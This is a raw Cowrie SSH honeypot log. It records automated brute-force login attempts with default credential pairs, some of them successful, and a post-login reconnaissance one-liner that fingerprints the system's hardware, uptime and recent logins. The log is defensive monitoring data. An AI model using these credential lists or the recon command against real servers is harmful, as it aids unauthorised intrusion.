{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:28.059068Z","src_ip":"212.227.125.160","session":"71c11d9d4189"}
{"eventid":"cowrie.login.failed","username":"backup","password":"backup","message":"login attempt [backup/backup] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:28.213615Z","src_ip":"212.227.125.160","session":"71c11d9d4189"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:29.267508Z","src_ip":"212.227.125.160","session":"71c11d9d4189"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39264,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fc222776fae","protocol":"ssh","message":"New connection: 212.227.235.229:39264 (1.2.3.4:22) [session: 6fc222776fae]","sensor":"my-vps","timestamp":"2025-08-26T11:56:29.977753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:30.366731Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:56:30.367379Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.login.success","username":"root","password":"123123","message":"login attempt [root/123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:56:32.365487Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:56:33.387630Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.388371Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.388861Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.389711Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.390576Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.391408Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.392230Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.393262Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.393792Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.394319Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.394874Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.395651Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.396043Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40022,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a08bda58ce5","protocol":"ssh","message":"New connection: 212.227.125.160:40022 (1.2.3.4:22) [session: 0a08bda58ce5]","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.649229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.660777Z","src_ip":"212.227.125.160","session":"0a08bda58ce5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":47958,"dst_ip":"1.2.3.4","dst_port":22,"session":"0be2653b3223","protocol":"ssh","message":"New connection: 83.168.105.65:47958 (1.2.3.4:22) [session: 0be2653b3223]","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.692581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.693530Z","src_ip":"83.168.105.65","session":"0be2653b3223"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.719265Z","src_ip":"212.227.125.160","session":"0a08bda58ce5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.729644Z","src_ip":"83.168.105.65","session":"0be2653b3223"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.839531Z","src_ip":"83.168.105.65","session":"0be2653b3223"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.907197Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.908112Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:33.909473Z","src_ip":"212.227.235.229","session":"6fc222776fae"}
{"eventid":"cowrie.login.failed","username":"cowrie","password":"cowrie","message":"login attempt [cowrie/cowrie] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:34.188964Z","src_ip":"212.227.125.160","session":"0a08bda58ce5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:34.877159Z","src_ip":"83.168.105.65","session":"0be2653b3223"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:35.241675Z","src_ip":"212.227.125.160","session":"0a08bda58ce5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33728,"dst_ip":"1.2.3.4","dst_port":22,"session":"797f9067ec30","protocol":"ssh","message":"New connection: 212.227.235.229:33728 (1.2.3.4:22) [session: 797f9067ec30]","sensor":"my-vps","timestamp":"2025-08-26T11:56:38.634555Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40790,"dst_ip":"1.2.3.4","dst_port":22,"session":"948045d5da16","protocol":"ssh","message":"New connection: 212.227.125.160:40790 (1.2.3.4:22) [session: 948045d5da16]","sensor":"my-vps","timestamp":"2025-08-26T11:56:38.699586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:38.700433Z","src_ip":"212.227.125.160","session":"948045d5da16"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:39.243271Z","src_ip":"212.227.235.229","session":"797f9067ec30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:39.243961Z","src_ip":"212.227.235.229","session":"797f9067ec30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:41.153148Z","src_ip":"212.227.125.160","session":"948045d5da16"}
{"eventid":"cowrie.login.failed","username":"sem7","password":"sem7","message":"login attempt [sem7/sem7] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:41.749673Z","src_ip":"212.227.125.160","session":"948045d5da16"}
{"eventid":"cowrie.login.success","username":"root","password":"Martand@123","message":"login attempt [root/Martand@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:56:42.630071Z","src_ip":"212.227.235.229","session":"797f9067ec30"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:42.801860Z","src_ip":"212.227.125.160","session":"948045d5da16"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:43.216572Z","src_ip":"212.227.235.229","session":"797f9067ec30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41562,"dst_ip":"1.2.3.4","dst_port":22,"session":"8893bd8571cb","protocol":"ssh","message":"New connection: 212.227.125.160:41562 (1.2.3.4:22) [session: 8893bd8571cb]","sensor":"my-vps","timestamp":"2025-08-26T11:56:45.599892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:45.600786Z","src_ip":"212.227.125.160","session":"8893bd8571cb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:45.650946Z","src_ip":"212.227.125.160","session":"8893bd8571cb"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:45.807978Z","src_ip":"212.227.125.160","session":"8893bd8571cb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:46.860977Z","src_ip":"212.227.125.160","session":"8893bd8571cb"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41080,"dst_ip":"1.2.3.4","dst_port":22,"session":"fde7c20c48d9","protocol":"ssh","message":"New connection: 83.168.105.65:41080 (1.2.3.4:22) [session: fde7c20c48d9]","sensor":"my-vps","timestamp":"2025-08-26T11:56:49.119563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:49.120276Z","src_ip":"83.168.105.65","session":"fde7c20c48d9"}
